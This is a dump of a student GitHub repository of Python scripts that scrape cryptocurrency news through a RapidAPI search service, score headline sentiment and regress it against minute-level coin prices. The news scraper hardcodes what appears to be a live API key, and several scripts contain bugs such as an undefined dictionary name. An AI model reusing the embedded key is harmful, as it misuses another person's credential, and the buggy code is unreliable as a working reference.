1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6809963583946228, "alphanum_fraction": 0.6926476359367371, "avg_line_length": 30.075000762939453, "blob_id": "9aaaebf1e9aa885ba8134ee36e97206fee898c43", "content_id": "5c1652dfab9eaba794c42b4676cf7a5c03e2d4f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2489, "license_type": "no_license", "max_line_length": 116, "num_lines": 80, "path": "/text_cleaning_scripts/datetime_editor.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pandas as pd \nfrom pytz import timezone\n\nclass datetime_editor:\n\t'''This script will format the datetime objects we want for our analysis of the news article data set. \n\tIt will provide the datetime in pst, and give the day of week, hour, minute, and whether or not it was a weekend'''\n\tdef __init__(self, coin, year, infile, outfile):\n\t\tself.infile = infile\n\t\tself.outfile = outfile\n\t\tself.df = pd.read_csv(infile, index_col =0)\n\n\n\tdef run(self):\n\t\tself.df['date_published'] = self.get_datetime_object()\n\t\tself.df['date_published_pst'] = self.get_pst()\n\t\tself.df['month_pst'] = self.get_month_pst()\n\t\tself.df['day_of_week_pst'] = self.get_day_of_week_pst()\n\t\tself.df['hour_pst'] = self.get_hour_pst()\n\t\tself.df['minute_pst'] = self.get_minute_pst()\n\t\tself.df['second_pst'] = self.get_second_pst()\n\t\tself.df['weekend'] = self.get_weekend()\n\t\t\n\n\t\tself.df.to_csv(self.outfile) #SAVING DATA TO OUTFILE\n\n\t\tprint(f'{self.outfile} saved to disk')\n\n\n\n\tdef get_datetime_object(self):\n\t\treturn pd.to_datetime(self.df['date_published'], utc=True)\n\n\tdef get_pst(self):\n\t\t#sets the timezone to pst\n\t\treturn self.df['date_published'].dt.tz_convert(timezone('US/Pacific'))\n\n\tdef get_month_pst(self):\n\t\t#changes the vecotr into a Datetime index, which has the attributes Year, Month, Day, Hour, Etc\n\t\treturn 
pd.DatetimeIndex(self.df['date_published_pst']).month\n\n\tdef get_day_of_week_pst(self):\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).dayofweek\n\n\tdef get_hour_pst(self):\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).hour\n\n\tdef get_minute_pst(self):\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).minute\n\n\tdef get_second_pst(self):\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).second\n\n\tdef get_weekend(self):\n\t\t# print(self.df['day_of_week_pst'])\n\t\treturn self.df['day_of_week_pst'].apply(lambda row : 0 if (row >= 0 and row <=4) else 1)\n\n\t\t\n\n\n\n\n\t\t\n\n\nif __name__ == '__main__':\n\t\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\tyears = range(2018, 2020)\n\tfor year in years:\n\t\tfor coin in coins:\n\t\t\t#establishign where we are reading and writing our data to\n\t\t\tinfile = f'../data/news_data_collected_01_2020/preprocessed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\toutfile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\n\n\t\teditor = datetime_editor(coin, year, infile, outfile)\n\t\teditor.run()\n\t# editor = datetime_editor(2017, 'bitcoin')\n\t# editor.get_weekend()\n\t\n\n" }, { "alpha_fraction": 0.7829457521438599, "alphanum_fraction": 0.7829457521438599, "avg_line_length": 63.5, "blob_id": "a26829e0416d2a9950c123351b926f25dacf4bc5", "content_id": "0244788986be7992a9eaec493634bffe7d879af3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 258, "license_type": "no_license", "max_line_length": 178, "num_lines": 4, "path": "/scraper_scripts/README.md", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "#news_scraper.py\nThis script will use the Contextual News Search API (https://rapidapi.com/contextualwebsearch/api/web-search) to gather news data based on a given key word in a given time frame.\n\nThis will then gather that data, 
and place it in a csv file. " }, { "alpha_fraction": 0.7208297252655029, "alphanum_fraction": 0.7208297252655029, "avg_line_length": 25.930233001708984, "blob_id": "d84afaec4281970aede9d240d8ca134138d5b5e2", "content_id": "b01a8cf7660ae08795dc7a601799a929fb6a0d0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1157, "license_type": "no_license", "max_line_length": 130, "num_lines": 43, "path": "/regression_analysis/display_SLRM_results.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "from statsmodels.regression.linear_model import OLSResults\nfrom os import listdir\nimport pandas as pd \n\n\ndef main(models):\n\t#models is the list of model names\n\tr_squareds = []\n\tcoefficients = []\n\tstanderd_errors = []\n\tresiduals = []\n\n\tfor model in models:\n\t\t\n\n\t\tresults = OLSResults.load(f'regression_models/return_predictions/{coin}/{model}')\n\t\tr_squareds.append(results.rsquared)\n\t\tcoefficients.append(tuple(results.params))\n\t\tstanderd_errors.append(tuple(results.bse))\n\t\tresiduals.append(results.df_resid)\n\n\t\t# model_dict.update({model, [results.rsquared, results.params,results.bse]})\n\n\t\n\tmodel_dict = {'r_squareds': r_squareds, 'coefficients': coefficients, 'standerd_errors': standerd_errors, 'residuals': residuals}\n\n\tprint(model_dict)\n\n\n\tmodel_df = pd.DataFrame(model_dict, index=models).sort_values('r_squareds', ascending=False)\n\n\tprint(model_df)\n\n\t\n\tmodel_df.to_csv(f'results/return_predictions/{coin}_model_results.csv')\n\tprint('model saved to \"model_df.csv\"')\n\n\nif __name__ == '__main__':\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\tfor coin in coins:\n\t\tmodels = listdir(f'regression_models/return_predictions/{coin}')\n\t\tmain(models)" }, { "alpha_fraction": 0.6862068772315979, "alphanum_fraction": 0.6965517401695251, "avg_line_length": 26.821918487548828, "blob_id": "b0caff82ddef784e77b4bcd4166def40f89b4814", 
"content_id": "a818763c8624aa5745416e3087f4f5c70b28c9ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2030, "license_type": "no_license", "max_line_length": 119, "num_lines": 73, "path": "/analysis_scripts/merge_news_and_minute.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \nfrom math import log\nfrom datetime import datetime\nfrom os import listdir\n\n\n\ndef main(year, coin, minute_data_infile, news_data_infile, outfile):\n\t#this file will merge the minute data and the news_data into one file\n\n\t\n\t\n\t#making sure we only merge data for data we have\n\tminute_data_file_name = f'gemini_{coin_ticker}_{year}_1min.csv'\n\tclean_csv_df_file_name = f'{year}_{coin}_dataframe.csv'\n\n\t\n\tminute_data = pd.read_csv(minute_data_infile)\n\t\n\t\n\tnews_df = pd.read_csv(news_data_infile, index_col=1)\n\t\n\n\n\tprint(minute_data.columns)\n\tprint(news_df.columns)\n\n\t#gives us the log returns for each value\n\tminute_data['log_returns'] = minute_data['Close'].apply(log)\n\t\n\n\t#converts all strings, to datetime objects. Then makes all the seconds 0 in order\n\t#to match the minutes for the minute date data frame.\n\tnews_df['date_published'] = pd.to_datetime(news_df['date_published'], utc=True).apply(lambda dt: dt.replace(second=0))\n\tminute_data['Date'] = pd.to_datetime(minute_data['Date'], utc=True)\n\n\t#takes value of 1 or 0. 
Tells whether or not an article was released in that minute\n\tmerged_df = minute_data.merge(news_df, how='left',left_on='Date', right_on='date_published')\n\n\n\tmerged_df.to_csv(outfile)\n\tprint(f'{outfile} saved to disk')\n\n\n\ndef get_ticker(coin):\n\tticker_dict = {\n\t'bitcoin':'BTCUSD',\n\t'ethereum': 'ETHUSD',\n\t'Zcash': 'ZECUSD',\n\t'litecoin': 'LTCUSD'\n\t}\n\n\treturn ticker[coin]\n\n\n\n\nif __name__ == '__main__':\n\tyears = range(2018, 2020)\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\tfor coin in coins:\n\t\tfor year in years:\n\t\t\t#gives us the coin ticker given the coin name\n\t\t\tcoin_ticker = get_ticker(coin)\n\t\t\tprint(coin_ticker)\n\n\t\t\tminute_data_infile = f'../data/crypto_minute_data/{year}/gemini_{coin_ticker}_{year}_1min.csv'\n\t\t\tnews_data_infile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\t\n\t\t\toutfile = f'../data/news_crypto_merge/{year}/{year}_{coin}_merged_df.csv'\n\t\t\t\n\t\t\tmain(year, coin, minute_data_infile, news_data_infile, outfile)" }, { "alpha_fraction": 0.6621392369270325, "alphanum_fraction": 0.6723259687423706, "avg_line_length": 21.615385055541992, "blob_id": "788a9ea6a465793e4cff641a4d61d5d8da49dc40", "content_id": "b01152b68d4b5e41aede67b6c43c77440b139971", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 589, "license_type": "no_license", "max_line_length": 88, "num_lines": 26, "path": "/analysis_scripts/sk_learn_regression_models.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \nfrom sklearn import linear_model\nfrom math import log\n\n\nclass regression_maker():\n\tdef __init__(self, coin, year):\n\t\tself.coin = coin\n\t\tself.news_df = pd.read_csv(f'clean_csv_dataframes/{year}_{coin}_dataframe.csv')\n\t\tself.minute_data = pd.read_csv(f'Crypto_Data/gemini_BTCUSD_{year}_1min.csv', header=1)\n\n\n\tdef main(self):\n\t\tx = 
self.news_df['sentiment_polarity']\n\t\ty = self.minute_data['Close']\n\t\ty = y.apply(log)\n\n\t\tprint(y)\n\t\tmodel = linear_model.LinearRegression().fit(x,y)\n\n\n\n\nif __name__ == '__main__':\n\tmaker = regression_maker('bitcoin', 2017)\n\tmaker.main()\n\n" }, { "alpha_fraction": 0.6590577960014343, "alphanum_fraction": 0.6618099212646484, "avg_line_length": 37.13580322265625, "blob_id": "785a541bb9d452e6ca780b0a8455abff9de69f80", "content_id": "967e98c524d257677f4d071ae31238c1937f848f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6177, "license_type": "no_license", "max_line_length": 123, "num_lines": 162, "path": "/analysis_scripts/plot_regression_results.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \nimport matplotlib.pyplot as plt \nfrom statsmodels.regression.linear_model import OLSResults\nfrom os import listdir\nimport seaborn as sn; sn.set()\nfrom pprint import pprint\nclass plot_regression_results:\n\n\tdef __init__(self, dependent_variable='return', save=False, show=False):\n\t\tself.dependent_variable = dependent_variable\n\t\tself.save=save\n\t\tself.show=show\n\n\n\tdef main(self, pickle_names, path=None):\n\t\t#will give me the first results, bit coin in this case\n\t\t#run plots for all coins\n\t\tfor pickle_name in pickle_names:\n\t\t\tdf = pd.read_pickle(path+pickle_name).reset_index()\n\t\t\tdf[['coefficients', 'standerd_errors']] = df[['coefficients', 'standerd_errors']].round(2)\n\t\t\tdf = df[df['residuals'] > 100]\n\t\t\tcoin = pickle_name.split('_')[0]\n\t\t\tprint(coin)\n\n\t\t\t# self.plot_r_squareds(df, coin)\n\t\t\tself.plot_coefficients(df, coin)\n\n\tdef plot_r_squareds(self, df, coin):\n\t\t##########################################################################\n\t\t#this janky ass code converts the times coefficient to an integer, sorts the \n\t\t#whole df by 'times' then converts times back into a 
string\n\t\tdf['times'] = df['times'].apply(int)\n\t\tdf = df.sort_values(by='times')\n\t\tdf['times'] = df['times'].apply(str)\n\t\t################################################################\n\t\tx = df['times']\n\t\ty=df['r_squareds']\n\n\t\tplt.errorbar(x=x, y=y, fmt= 'o', marker ='.')\n\t\tplt.axhline(y=0, color='r', linestyle= '-')\n\t\tplt.xlabel('Times')\n\t\tplt.ylabel('R^2')\n\t\tplt.title(f'{coin}: {self.dependent_variable}')\n\n\t\tif self.save:\n\t\t\tplt.savefig(f'plots/{self.dependent_variable}_analysis/regression_plots/r_squareds/{coin}_rsquared_plot')\n\t\t\tprint('saved figure')\n\t\t\n\t\tif self.show:\n\t\t\tplt.show()\n\t\telse:\n\t\t\tplt.close()\n\t\t\n\tdef plot_coefficients(self, df,coin):\n\t\tprint(df.columns)\n\t\tindex = df.index\n\n\t\t#gives a uniques list of all formulas\n\t\tformulas = list(df['formulas'].drop_duplicates())\n\n\t\t#generate a data frame with only the best r^2 for each data frame\n\t\tbest_df = self.get_best_df(df, formulas)\t\n\t\t#this will let me access the coeffients within the tuple in the dataframe\n\t\t\n\n\t\t# print(df)\n\t\t# print(df[['coefficients', 'standerd_errors']])\n\t\taggregate_polarity_dict = {'times': [], 'coefficients': [], 'standerd_errors': []}\n\t\tpolarity_squared_dict = {'times': [], 'coefficients': [], 'standerd_errors': []}\n\t\tpolarity_cubed_dict = {'times': [], 'coefficients': [], 'standerd_errors': []}\n\t\thigh_sentiment_dict = {'times': [], 'coefficients': [], 'standerd_errors': []}\n\t\tprint(df['coefficients'][1])\n\n\t\t#this loop will give me all of my data in dictionaries aggregated appropriately\n\t\tfor index, row in df.iterrows():\n\t\t\tcoefs = list(row['coefficients'].index)\n\n\t\t\t#the following set of if statements creates dictionaries with wanted attributes\n\t\t\t#in the regression models that contain that specific coefficient \n\t\t\tif 'aggregate_polarity' in 
coefs:\n\t\t\t\taggregate_polarity_dict['times'].append(row['times'])\n\t\t\t\taggregate_polarity_dict['coefficients'].append(row['coefficients']['aggregate_polarity'])\n\t\t\t\taggregate_polarity_dict['standerd_errors'].append(row['standerd_errors']['aggregate_polarity'])\n\n\t\t\tif 'power(aggregate_polarity, 2)' in coefs:\n\t\t\t\tpolarity_squared_dict['times'].append(row['times'])\n\t\t\t\tpolarity_squared_dict['coefficients'].append(row['coefficients']['aggregate_polarity'])\n\t\t\t\tpolarity_squared_dict['standerd_errors'].append(row['standerd_errors']['aggregate_polarity'])\n\n\t\t\tif 'power(aggregate_polarity, 3)' in coefs:\n\t\t\t\tpolarity_cubed_dict['times'].append(row['times'])\n\t\t\t\tpolarity_cubed_dict['coefficients'].append(row['coefficients']['aggregate_polarity'])\n\t\t\t\tpolarity_cubed_dict['standerd_errors'].append(row['standerd_errors']['aggregate_polarity'])\n\n\n\t\t\tif 'high_sentiment' in coefs:\n\t\t\t\thigh_sentiment_dict['times'].append(row['times'])\n\t\t\t\thigh_sentiment_dict['coefficients'].append(row['coefficients']['aggregate_polarity'])\n\t\t\t\thigh_sentiment_dict['standerd_errors'].append(row['standerd_errors']['aggregate_polarity'])\n\n\n\t\t\n\t\tdictionaries = [aggregate_polarity_dict, polarity_squared_dict, polarity_cubed_dict, high_sentiment_dict]\n\t\tcoefficient_name = ['aggregate_polarity', 'polarity_squared', 'polarity_cubed', 'high_sentiment']\n\t\tprint(type(aggregate_polarity_dict['times'][0]))\n\n\t\tcoef_dfs = [pd.DataFrame(coef) for coef in dictionaries]\n\n\n\n\t\t#finally, it is time to make some plots\n\t\tfor coefficient, coefficient_name in zip(coef_dfs, coefficient_name):\n\t\t\t##########################################################################\n\t\t\t#this janky ass code converts the times coefficient to an integer, sorts the \n\t\t\t#whole df by 'times' then converts times back into a string\n\t\t\tcoefficient['times'] = coefficient['times'].apply(int)\n\t\t\tcoefficient = 
coefficient.sort_values(by='times')\n\t\t\tcoefficient['times'] = coefficient['times'].apply(str)\n\t\t\t################################################################\n\n\t\t\tx = coefficient['times']\n\t\t\ty = coefficient['coefficients']\n\t\t\tstanderd_errors = coefficient['standerd_errors']\n\t\t\t# plt.scatter(x=x, y=y)\n\t\t\tplt.errorbar(x=x, y=y, yerr=standerd_errors, fmt='o', ecolor='r', elinewidth=2, marker='.')\n\n\t\t\tplt.ylim(bottom=-2, top=1)\n\t\t\t\n\t\t\tplt.axhline(y=0, color='c', linestyle= '-')\n\n\t\t\tplt.title(coefficient_name)\n\n\t\t\tplt.xlabel('times')\n\t\t\tplt.ylabel('Beta')\n\t\t\tif self.save:\n\t\t\t\tplt.savefig(f'plots/{self.dependent_variable}_analysis/regression_plots/coefficients/{coin}_{coefficient_name}_plot')\t\t\n\t\t\t\tprint('saved figure')\n\t\t\t\n\t\t\tif self.show:\n\t\t\t\tplt.show()\n\t\t\telse:\n\t\t\t\tplt.close()\n\n\n\n\tdef get_best_df(self, df,formulas):\n\t\t'''gives the dataframe with only the highest r^2 values'''\n\t\tbest_df = []\n\t\tfor formula in formulas:\n\t\t\tspliced_df = df[df['formulas'] == formula].reset_index()\n\n\t\t\tbest_df.append(spliced_df.iloc[spliced_df['r_squareds'].idxmax()])\n\t\t\treturn best_df\n\nif __name__ == '__main__':\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\t# results = listdir(f'results/return_predictions/{coin}')\n\tdependent_variable = 'volume'\n\tpath =f'results/{dependent_variable}_predictions/'\n\tpickle_names = listdir(path)\n\tplotter = plot_regression_results(dependent_variable = dependent_variable, save=True, show=False)\n\tplotter.main(pickle_names, path)" }, { "alpha_fraction": 0.7347466349601746, "alphanum_fraction": 0.7362978458404541, "avg_line_length": 34.83333206176758, "blob_id": "14523d90a99d311b2bc18fcee04ff70178e45b0f", "content_id": "335f0250d8c44f8212fe6f8e2ddc9857cd5731b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1934, "license_type": "no_license", 
"max_line_length": 168, "num_lines": 54, "path": "/analysis_scripts/get_regression_results.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "from statsmodels.regression.linear_model import OLSResults\nfrom os import listdir\nimport pandas as pd \nfrom numpy import power\n'''This script is designed to take all the regression models generated by time_series_analysis.py\nand aggregate the macro results: R^2, standerd erros, etc. And put those macro results in a \nreadable form that can analyze the results of the regression'''\n\n\ndef main(models, coin, dependent_variable='return'):\n\t#models is the list of model names\n\tr_squareds = []\n\tcoefficients = []\n\tstanderd_errors = []\n\tresiduals = []\n\ttimes = []\n\tformulas = []\n\n\tfor model in models:\n\t\tresults = OLSResults.load(f'regression_models/{dependent_variable}_predictions/{coin}/{model}')\n\t\tr_squareds.append(results.rsquared)\n\t\t# coefficients.append(tuple(results.params))\n\t\t# standerd_errors.append(tuple(results.bse))\n\t\tcoefficients.append(results.params)\n\t\tstanderd_errors.append(results.bse)\n\t\tresiduals.append(results.df_resid)\n\t\ttimes.append(get_time(model))\n\t\tformulas.append(get_formula(model))\n\t#puts all the import variables into a dictinary\n\tmodel_dict = {'r_squareds': r_squareds, 'coefficients': coefficients, 'standerd_errors': standerd_errors, 'residuals': residuals, 'times': times, 'formulas': formulas}\n\n\tmodel_df = pd.DataFrame(model_dict, index=models).sort_values('r_squareds', ascending=False)\n\t\n\n\t\n\tmodel_df.to_pickle(f'results/{dependent_variable}_predictions/{coin}_model_results.pickle')\n\tprint(f'model saved to {coin}_model_results.pickle')\n\n\ndef get_time(model_name):\n\t'''gets the time for one model using the regex'''\n\treturn model_name.split('_')[-2]\n\ndef get_formula(model_name):\n\treturn ''.join(model_name.split()[:-1])\n\n\n\nif __name__ == '__main__':\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 
'litecoin']\n\tdependent_variable = 'volume'\n\tfor coin in coins:\n\t\tmodels = listdir(f'regression_models/{dependent_variable}_predictions/{coin}')\n\t\tmain(models, coin, dependent_variable=dependent_variable)" }, { "alpha_fraction": 0.6786597371101379, "alphanum_fraction": 0.6874485015869141, "avg_line_length": 29.350000381469727, "blob_id": "59c3b93f7bcf60f6f8c5fc289cd4af34e166d702", "content_id": "a81777a2e20eb0ffbd7d999a929558934061f72e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3641, "license_type": "no_license", "max_line_length": 214, "num_lines": 120, "path": "/scraper_scripts/news_scraper.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \nimport pickle\nimport requests\nfrom bs4 import BeautifulSoup\nfrom json import loads\n\nclass contextual_news_scraper:\n\t'''This program will use the Contexutual News API to download news articles given a key word and return a data frame with relevant information about the articless'''\n\tdef __init__(self, term, year, pages=1, start_month=1, end_month=13):\n\n\t\tself.pages = pages\n\t\tself.term = term\n\t\tself.year = year\n\n\t\t#lets you decide what month to start your search\n\t\tself.start_month = start_month\n\t\tself.end_month = end_month\n\n\tdef get_news_df(self):\n\t\t#establishing all the data points that we want to get \n\t\ttitles = []\n\t\tkeywords = []\n\t\turls = []\n\t\tlanguage = []\n\t\tpublishers = []\n\t\tdatetimes = []\n\t\tdescriptions = []\n\t\tbodies = []\n\n\t\t#Main loop of the function. 
will loop through all the months in the given year to get data\n\t\tfor month in range(self.start_month, self.end_month):\n\n\t\t\t#reads through all the pages on this given query\n\t\t\tfor page in range(self.pages):\t\n\n\t\t\t\ttry:\n\t\t\t\t\tresponse_json = self.get_json(page, month) #function call to the Search API itself\n\t\t\t\texcept:\n\t\t\t\t\tbreak #breaks from the loop and saves the values that we have\n\n\t\t\t\t#if the page has no information, we will move to the next one\n\t\t\t\tif len(response_json['value']) == 0:\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\tfor value in response_json['value']:\n\t\t\t\t\t#putting titles in list\n\t\t\t\t\t\n\t\t\t\t\ttitles.append(value['title'])\n\t\t\t\t\tkeywords.append(value['keywords'])\n\t\t\t\t\turls.append(value['url'])\n\t\t\t\t\tlanguage.append(value['language'])\n\t\t\t\t\tpublishers.append(value['provider']['name'])\n\t\t\t\t\tdatetimes.append(value['datePublished'])\n\t\t\t\t\tdescriptions.append(value['description'])\n\t\t\t\t\tbodies.append(value['body'])\n\n\n\t\tdata_dict = {'title': titles, 'url': urls, 'language': language, 'keywords': keywords, 'publisher': publishers, 'date_published': datetimes,'article': bodies}\n\t\t\n\t\tnews_df = pd.DataFrame(data_dict)\n\n\n\t\treturn news_df\n\t\t\n\n\n\n\n\tdef get_json(self, page, month):\n\t\turl = \"https://contextualwebsearch-websearch-v1.p.rapidapi.com/api/Search/NewsSearchAPI\" #url to the contexual search api\n\n\t\t#QUERIES TO API\n\t\tif month == 12: #needs custom syntax for the month of december\n\t\t\tquerystring = {\"fromPublishedDate\":f\"{month}/01/{self.year}\",f\"toPublishedDate\":f\"{month}/31/{self.year}\", \"autoCorrect\":\"false\",\"pageNumber\":page,\"pageSize\":f\"{self.pages}\",\"q\":self.term,\"safeSearch\":\"false\"}\n\t\t\n\t\telse: #query to all months that are not december\n\t\t\tquerystring = {\"fromPublishedDate\":f\"{month}/01/{self.year}\",f\"toPublishedDate\":f\"{month+1}/01/{self.year}\", 
\"autoCorrect\":\"false\",\"pageNumber\":page,\"pageSize\":f\"{self.pages}\",\"q\":self.term,\"safeSearch\":\"false\"}\n\t\t\n\t\theaders = {\n\t\t 'x-rapidapi-host': \"contextualwebsearch-websearch-v1.p.rapidapi.com\",\n\t\t 'x-rapidapi-key': \"94ed915629msh28a8aee42e9c89dp1cdc6ejsn5fed886c6b11\"\n\t\t }\n\t\t\n\t\t#Returns the response page from the API\n\t\tresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n\t\n\t\t#converts response into json format\n\t\tresponse_json = loads(response.text)\n\n\t\tprint(response.headers)\n\n\t\treturn response_json\t\n\t\t\n\n\n\n\n\nif __name__ == '__main__':\n\n\n\n\tyears = [2018, 2019]\n\tcoins = ['bitcoin', 'ethereum', 'zcash', 'litecoin']\n\tstart_month = 1\n\tend_month = 13\n\t\n\tfor coin in coins:\n\n\t\tfor year in years:\n\n\t\t\tscraper = contextual_news_scraper(coin, year, pages=50, start_month=start_month, end_month=end_month) #initializes scraper\n\t\t\tnews_df = scraper.get_news_df() #scrapes data and return dataframe\n\n\t\t\toutfile_path = f'../data/news_data_updated/{year}_{coin}_dataframe.csv'\t#sets path of outfile\t\n\n\t\t\tnews_df.to_csv(outfile_path) #saves dataframe to csv file\n\n\t\t\tprint('News Data Frame sucessfully saved to disk!')" }, { "alpha_fraction": 0.7028347849845886, "alphanum_fraction": 0.7223851680755615, "avg_line_length": 26.675676345825195, "blob_id": "dda9242f8d4458a5f318307e8620112a3169a1a2", "content_id": "9fdf4150d81331bf4715fe2e4e7efa582d1a86a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1023, "license_type": "no_license", "max_line_length": 101, "num_lines": 37, "path": "/analysis_scripts/sentiment_analyzer.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "from textblob import TextBlob \nimport pandas as pd \n\ndef main(coin,year, infile, outfile):\n\n\tdf = pd.read_csv(infile)\n\n\t#applies the function to everysingle value in the 
column\n\tdf['sentiment_polarity'] = df['processed_titles'].apply(sentiment_analysis_polarity)\n\n\t#applies the function to everysingle value in the column\n\tdf['sentiment_subjectivity'] = df['processed_titles'].apply(sentiment_analysis_subjectivity)\n\n\tdf.to_csv(outfile)\n\n\n\ndef sentiment_analysis_polarity(df):\n\treturn TextBlob(df).sentiment.polarity\n\ndef sentiment_analysis_subjectivity(df):\n\treturn TextBlob(df).sentiment.subjectivity\n\n\n\n\nif __name__ == '__main__':\n\tyears = range(2018, 2020)\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\t\n\tfor year in years:\n\t\tfor coin in coins:\n\t\t\tprint(year,coin)\n\t\t\tinfile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\toutfile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\t\n\t\t\tmain('coin', year, infile, outfile)" }, { "alpha_fraction": 0.7861396670341492, "alphanum_fraction": 0.8007580041885376, "avg_line_length": 64.92857360839844, "blob_id": "7b303c2bdfd039d9013ef4a698ea16d7a2f4ead5", "content_id": "0a21b754a2ba3f663fc816fb7753c981253f3b27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1847, "license_type": "no_license", "max_line_length": 273, "num_lines": 28, "path": "/README.md", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "# Cryptocurrency Analysis through NLP\n\nThis is my ongoing Research Senior Project at Cal Poly San Luis Obispo that I'm performing with Professor Pratish Patel and Professor Ziemowit Bednarek.\n\nAll code thus far has been written by me exclusively.\n\nThe main idea behind this project is to see if we can find any correlation between news articles written about a given cryptocurrency and the return on the currency itself. 
I gathered data for Bitcoin, Ethereum, Litecoin, and ZCash\n\nTo accomplish this, I first used the contextual News Search API (https://rapidapi.com/contextualwebsearch/api/web-search?endpoint=5b8644c1e4b09cbc25b00140) to gather news articles which have the given cryptocurrency mentioned in it. This data had the following information:\n\n1. Title of Article\n2. URL to Article\n3. Language\n4. Article Publisher\n5. Datetime Published (UTC time)\n6. The Article itself\n\nPrelimnary Analysis was already done to see if the sentiment of the article title (Calculated using the TextBlob Library) had any correlation to the returns. I used OLS in the Statsmodels Library to look for correlation, but no correlation was found.\n\nThe next steps of the project are as follows:\n1. See if/when the articles gathered were ever published to Twitter. (Completed) [Used GetOldTweets3 Library]\n2. Run the same analysis, but to see if the time published to Twitter is more impactful on the return, as Twitter has a larger audience to spread the article to more people have the ability to impact the price.\n3. Create more features from the dataset.\n a. Create Word Embeddings of all the article titles from the dataset.\n b. Use those Word Embeddings to K-Means Cluster the data to put the articles in meaningful classifactions\n4. 
Perform more OLS, and potentially other estimators to see if a correlation can be created with the new data.\n\nThis is an ongoing project \n" }, { "alpha_fraction": 0.6889259815216064, "alphanum_fraction": 0.7000556588172913, "avg_line_length": 28.423728942871094, "blob_id": "189ddec16f3e043f5aff0644e9c02a8ababdb63c", "content_id": "86dda2191cc29b66fa7f65008009a649e293bce0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1797, "license_type": "no_license", "max_line_length": 159, "num_lines": 59, "path": "/text_cleaning_scripts/text_cleaning.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.cluster import KMeans\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nimport re\r\nfrom gensim.utils import simple_preprocess\r\nfrom string import punctuation\r\nimport nltk\r\n\r\ndef main(year, coin, infile, outfile):\r\n\t'''This function will do the text preprocessing to our dataset. 
It will '''\r\n\r\n\r\n\r\n\t\r\n\tdf = pd.read_csv(infile)\r\n\r\n\tdf['processed_titles'] = df.title.apply(lambda x: x.lower())\r\n\r\n\r\n\t\r\n\r\n\t#this maps all punctuation to None, \r\n\ttable = str.maketrans('', '', punctuation)\r\n\r\n\t#with the table mapping punctuation to None, this will replace all punctuation with blanks\r\n\tdf.processed_titles = df.processed_titles.apply(lambda x: x.translate(table).split())\r\n\r\n\t#initializes the word lemmatizer\r\n\tlemmatizer = WordNetLemmatizer()\r\n\r\n\t#goes through and removes all stopwords from title, and also lemmatizes each word in the title\r\n\tdf.processed_titles = df.processed_titles.apply(lambda x: ' '.join([lemmatizer.lemmatize(word) for word in x if word not in set(stopwords.words('english'))]))\r\n\r\n\r\n\t#removes the <b> in the data set\r\n\tdf.processed_titles = df.processed_titles.replace(to_replace=r'\\<[^>]*\\>',value='', regex =True)\r\n \r\n\tdf.to_csv(outfile)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\t\r\n\tyears = range(2017, 2020)\r\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\r\n\t\r\n\tfor year in years:\r\n\t\tfor coin in coins:\r\n\t\t\tprint(year, coin)\r\n\t\t\tinfile = f'../data/news_data_collected_01_2020/preprocessed_data/{year}/{year}_{coin}_dataframe.csv'\r\n\t\t\toutfile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\r\n\r\n\t\t\t# print(stopwords.words('english'))\r\n\t\t\tmain(year, coin, infile, 